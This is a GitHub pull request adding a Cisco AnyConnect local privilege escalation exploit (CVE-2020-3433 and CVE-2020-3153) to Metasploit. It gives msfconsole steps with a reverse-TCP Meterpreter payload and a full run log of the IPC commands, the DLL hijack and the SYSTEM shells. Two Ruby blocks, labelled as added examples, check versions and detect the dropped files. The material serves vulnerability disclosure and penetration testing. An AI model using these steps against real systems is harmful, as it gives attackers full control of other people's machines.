Added CVE-2020-3433 module #14187

Merged
merged 1 commit into from
Sep 29, 2020
Conversation

goichot
Contributor

@goichot goichot commented Sep 25, 2020

Hi,

This PR changes the modules/exploit/windows/local/anyconnect_path_traversal_lpe module that exploits CVE-2020-3153 (msf module by @cdelafuente-r7) to add the possibility to exploit another local privilege escalation that I found in Cisco AnyConnect for Windows: CVE-2020-3433.

By default, this module will exploit CVE-2020-3433 (more versions vulnerable) but you can set an option to exploit CVE-2020-3153 (if vulnerable).

Cisco's advisory: link

My PoC and technical details for CVE-2020-3433 (+ CVE-2020-3434 & CVE-2020-3435) are on my GitHub: link (in particular, you can check the Details.md file).

Antoine

Vulnerable Application

The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
to create/overwrite files in arbitrary locations with system level privileges.

The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.9.00086 is vulnerable to a DLL hijacking and allows local attackers
to execute code on the affected machine with system level privileges.

Both attacks consist of sending a specially crafted IPC request to the TCP
port 62522 on the loopback device, which is exposed by the Cisco AnyConnect
Secure Mobility Agent service. This service will then launch the vulnerable
installer component (vpndownloader), which copies itself to an arbitrary
location (CVE-2020-3153) or with a supplied DLL (CVE-2020-3433) before being
executed with system privileges. Since vpndownloader is also vulnerable to DLL
hijacking, a specially crafted DLL (dbghelp.dll) is created at the same
location vpndownloader will be copied to, in order to get code execution with
system privileges.

The CVE-2020-3153 exploit has been successfully tested against Cisco AnyConnect
Secure Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86); the CVE-2020-3434 exploit has been
successfully tested against Cisco AnyConnect Secure Mobility Client versions
4.5.02036, 4.6.03049, 4.7.04056, 4.8.01090 and 4.8.03052 on Windows 10 version
1909 (x64) and 4.7.4056 on Windows 7 SP1 (x64).

AnyConnect Secure Mobility Client is not publicly available and only customers
with active contracts can download it. For this reason, download links have not
been provided.

Verification Steps

  1. Start msfconsole
  2. Get a session with non-administrative privileges
  3. Do: use exploit/windows/local/anyconnect_lpe
  4. Do: set SESSION <SESSION>
  5. Do: set payload windows/meterpreter/reverse_tcp
  6. Do: set LHOST <LHOST>
  7. Do: set LPORT <LPORT>
  8. Do: check
  9. Do: run
  10. You should get a new session as the SYSTEM user

Options

INSTALL_PATH

Set Cisco AnyConnect Secure Mobility Client installation path (where
vpndownloader.exe should be found). It will be automatically detected if not set.

CVE

Set the CVE to use (CVE-2020-3153 or CVE-2020-3433). Default: CVE-2020-3433.

ForceExploit

Set this to true to override the check result during exploitation.
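The documentation above gives two fixed versions (4.8.02042 for CVE-2020-3153, 4.9.00086 for CVE-2020-3433) and shows AnyConnect versions written both as "4.7.04056" and "4.7.4056". The following Ruby is an added example, not code from the PR or the Metasploit module: it compares an installed version string against both fixed versions numerically, so leading zeros and trailing ".0" components (as in "4.5.4029.0.0") do not distort the result, and reports which advisories a given install is still exposed to. The version strings and the dotted-decimal format are the only assumptions.

```ruby
# Added example (not part of the Metasploit module or this PR): decide which of
# the two AnyConnect advisories an installed version is still exposed to, using
# the fixed versions stated in the module documentation.
# Assumption: versions are dotted decimal as AnyConnect reports them, e.g.
# "4.5.4029.0.0" (file version) or "4.8.02042" (advisory notation).

FIXED_VERSIONS = {
  'CVE-2020-3153' => '4.8.02042', # path traversal in the vpndownloader installer
  'CVE-2020-3433' => '4.9.00086'  # DLL hijacking (dbghelp.dll) in vpndownloader
}.freeze

# Parse "4.7.04056" or "4.7.4056.0.0" into [4, 7, 4056] so that leading zeros
# and trailing zero components do not affect the comparison.
def parse_version(str)
  raise ArgumentError, "bad version: #{str.inspect}" unless str =~ /\A\d+(\.\d+)*\z/
  parts = str.split('.').map(&:to_i)
  parts.pop while parts.length > 1 && parts.last.zero?
  parts
end

# Numeric, component-wise comparison returning -1, 0 or 1 like <=>.
def compare_versions(a, b)
  pa = parse_version(a)
  pb = parse_version(b)
  width = [pa.length, pb.length].max
  (pa + [0] * (width - pa.length)) <=> (pb + [0] * (width - pb.length))
end

# Return the CVE ids whose fix is newer than the installed version.
def exposed_cves(installed)
  FIXED_VERSIONS.select { |_cve, fixed| compare_versions(installed, fixed) < 0 }.keys
end

if __FILE__ == $PROGRAM_NAME
  # Sample versions taken from the documentation above; 4.8.03052 is past the
  # CVE-2020-3153 fix but before the CVE-2020-3433 fix.
  ['4.5.4029.0.0', '4.7.4056', '4.8.03052', '4.9.00086'].each do |v|
    cves = exposed_cves(v)
    puts "#{v}: #{cves.empty? ? 'not affected by either advisory' : cves.join(', ')}"
  end
end
```

The numeric comparison is the point: a plain string comparison would call "4.7.4056" older than "4.7.04056" and "4.8.03052" older than "4.8.02042", both wrong.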

@bwatters-r7
Contributor

bwatters-r7 commented Sep 29, 2020

To be clear, here it is working with both CVEs....

msf6 exploit(windows/local/anyconnect_lpe) > set CVE CVE-2020-3433
CVE => CVE-2020-3433
msf6 exploit(windows/local/anyconnect_lpe) > check

[-] Exploit failed: Msf::OptionValidateError The following options failed to validate: SESSION.
[-] Check failed: The state could not be determined.
msf6 exploit(windows/local/anyconnect_lpe) > set session 4
session => 4
msf6 exploit(windows/local/anyconnect_lpe) > check

[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.5.4029.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
msf6 exploit(windows/local/anyconnect_lpe) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.5.4029.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
[*] "-ipc" argument not needed
[*] Creating directory C:\Users\msfuser\AppData\Local\Temp\JWZSH3
[*] Meterpreter Session
[*] C:\Users\msfuser\AppData\Local\Temp\JWZSH3 created
[*] Writing the payload to C:\Users\msfuser\AppData\Local\Temp\JWZSH3\dbghelp.dll
[*] IPC Command: "CAC-nc-install	C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe	C:\Users\msfuser\AppData\Local\Temp\JWZSH3\dbghelp.dll"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded IPC command (size = 280 bytes)
[*] Sending stage (175174 bytes) to 192.168.132.134
[*] Meterpreter session 5 opened (192.168.135.197:4444 -> 192.168.132.134:49684) at 2020-09-29 13:35:18 -0500
[+] Deleted C:\Users\msfuser\AppData\Local\Temp\JWZSH3\dbghelp.dll
[+] Deleted C:\Users\msfuser\AppData\Local\Temp\JWZSH3
[*] Shutdown the socket

meterpreter > sysinfo
Computer        : DESKTOP-CL5L2IH
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.132.134 - Meterpreter session 5 closed.  Reason: User exit
msf6 exploit(windows/local/anyconnect_lpe) > set CVE CVE-2020-3153 
CVE => CVE-2020-3153
msf6 exploit(windows/local/anyconnect_lpe) > check

[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.5.4029.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
msf6 exploit(windows/local/anyconnect_lpe) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.5.4029.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
[*] "-ipc" argument not needed
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
[*] IPC Command: "CAC-nc-install	C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\pWul\pWul\pWul\pWul\../../../../vpndownloader.exe	-"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded IPC command (size = 259 bytes)
[*] Sending stage (175174 bytes) to 192.168.132.134
[*] Meterpreter session 6 opened (192.168.135.197:4444 -> 192.168.132.134:49687) at 2020-09-29 13:35:48 -0500
[+] Deleted C:\ProgramData\Cisco\dbghelp.dll
[+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
[*] Shutdown the socket

meterpreter > sysinfo
Computer        : DESKTOP-CL5L2IH
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
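The run above leaves two file artefacts a defender can key on: a dbghelp.dll dropped into a user-writable directory (the payload vpndownloader.exe loads) and, for the CVE-2020-3153 path, a copy of vpndownloader.exe outside the AnyConnect install directory. The following Ruby is an added example, not code from the PR or Metasploit: it runs those two rules over file-creation events. The tab-separated event format and the sample lines are constructed for this example; the trusted locations for dbghelp.dll (the Windows system directories) and the install directory are assumed defaults to adjust for your own telemetry.

```ruby
# Added example (not from the PR or the Metasploit module): a small detection
# pass over file-creation events for the two artefacts shown in the session
# output above. Event format (time, user, created path, tab separated) and the
# sample events are constructed for this example.

INSTALL_DIR = 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client'.freeze

# Directories where a dbghelp.dll is expected to live: the Windows system
# directories and the AnyConnect install directory (assumed defaults).
TRUSTED_DLL_DIRS = ['C:\Windows\System32', 'C:\Windows\SysWOW64', INSTALL_DIR].freeze

# Constructed sample telemetry mirroring the paths seen in the session output.
SAMPLE_EVENTS = <<~EVENTS
  2020-09-29T13:35:10\tmsfuser\tC:\\Users\\msfuser\\AppData\\Local\\Temp\\JWZSH3\\dbghelp.dll
  2020-09-29T13:35:11\tmsfuser\tC:\\Users\\msfuser\\AppData\\Local\\Temp\\report.docx
  2020-09-29T13:35:40\tmsfuser\tC:\\ProgramData\\Cisco\\dbghelp.dll
  2020-09-29T13:35:41\tSYSTEM\tC:\\ProgramData\\Cisco\\vpndownloader.exe
  2020-09-29T13:36:00\tSYSTEM\tC:\\Windows\\System32\\dbghelp.dll
  2020-09-29T13:36:05\tSYSTEM\tC:\\Program Files (x86)\\Cisco\\Cisco AnyConnect Secure Mobility Client\\vpndownloader.exe
EVENTS

# Split a Windows path into [directory, file name] on backslashes, since
# File.dirname on a non-Windows host does not treat '\' as a separator.
def win_split(path)
  parts = path.split('\\')
  [parts[0...-1].join('\\'), parts[-1]]
end

# Return a reason string when the created path matches one of the two rules,
# nil otherwise. Comparisons are case-insensitive as on NTFS.
def suspicious?(path)
  dir, name = win_split(path)
  case name.downcase
  when 'dbghelp.dll'
    if TRUSTED_DLL_DIRS.none? { |d| dir.casecmp?(d) }
      'dbghelp.dll written outside trusted directories (possible vpndownloader DLL hijack payload)'
    end
  when 'vpndownloader.exe'
    unless dir.casecmp?(INSTALL_DIR)
      'vpndownloader.exe copied outside the AnyConnect install directory'
    end
  end
end

# Run the rules over the event text and return one finding hash per hit.
def scan_events(text)
  text.each_line.map do |line|
    time, user, path = line.chomp.split("\t", 3)
    next if path.nil? || path.empty?
    reason = suspicious?(path)
    next unless reason
    { time: time, user: user, path: path, reason: reason }
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  scan_events(SAMPLE_EVENTS).each do |f|
    puts "#{f[:time]} #{f[:user]} #{f[:path]} -> #{f[:reason]}"
  end
end
```

Against the constructed events this flags the two dbghelp.dll drops and the vpndownloader.exe copy under C:\ProgramData\Cisco, and stays quiet on the system copy of dbghelp.dll and the genuine installer under Program Files.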


bwatters-r7 added a commit that referenced this pull request Sep 29, 2020
Merge branch 'land-14187' into upstream-master
@bwatters-r7 bwatters-r7 merged commit fef88f2 into rapid7:master Sep 29, 2020
@bwatters-r7
Contributor

bwatters-r7 commented Sep 29, 2020

Release Notes

Renamed the exploit/windows/local/anyconnect_path_traversal_lpe Cisco AnyConnect LPE module to exploits/windows/local/anyconnect_lpe and added the ability to exploit vulnerable targets via DLL hijacking (CVE-2020-3433).

@goichot
Contributor Author

goichot commented Sep 29, 2020

Thanks @bwatters-r7!

@adfoster-r7 adfoster-r7 added the rn-modules release notes for new or majorly enhanced modules label Oct 5, 2020
@pbarry-r7 pbarry-r7 added rn-enhancement release notes enhancement and removed rn-modules release notes for new or majorly enhanced modules labels Oct 14, 2020